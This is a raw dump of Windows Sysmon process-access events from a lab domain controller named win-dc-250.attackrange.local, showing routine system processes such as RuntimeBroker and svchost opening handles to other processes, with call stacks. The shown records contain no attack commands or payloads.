10341000x800000000000000011216Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42BD-6000-8700-000000009A01}4792C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011215Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42BD-6000-8600-000000009A01}4780C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011214Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42B0-6000-8500-000000009A01}4280C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011213Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42B0-6000-8400-000000009A01}4268C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011212Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011211Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011210Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011209Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4755-6000-1B05-000000009A01}3580C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011208Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011207Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-1505-000000009A01}3792C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011206Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011205Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011204Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42BD-6000-8700-000000009A01}4792C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011203Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42BD-6000-8600-000000009A01}4780C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011202Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42B0-6000-8500-000000009A01}4280C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011201Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42B0-6000-8400-000000009A01}4268C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011200Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.810{08A6967A-4298-6000-2F00-000000009A01}22522340C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bc62|c:\windows\system32\tileobjserver.dll+26db2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011199Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.810{08A6967A-4298-6000-2F00-000000009A01}22522340C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\tileobjserver.dll+bc0f|c:\windows\system32\tileobjserver.dll+26db2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011198Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.810{08A6967A-4298-6000-2F00-000000009A01}22522340C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bc62|c:\windows\system32\tileobjserver.dll+26f22|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011197Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.810{08A6967A-4298-6000-2F00-000000009A01}22522340C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\tileobjserver.dll+bc0f|c:\windows\system32\tileobjserver.dll+26f22|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011196Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.810{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011195Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 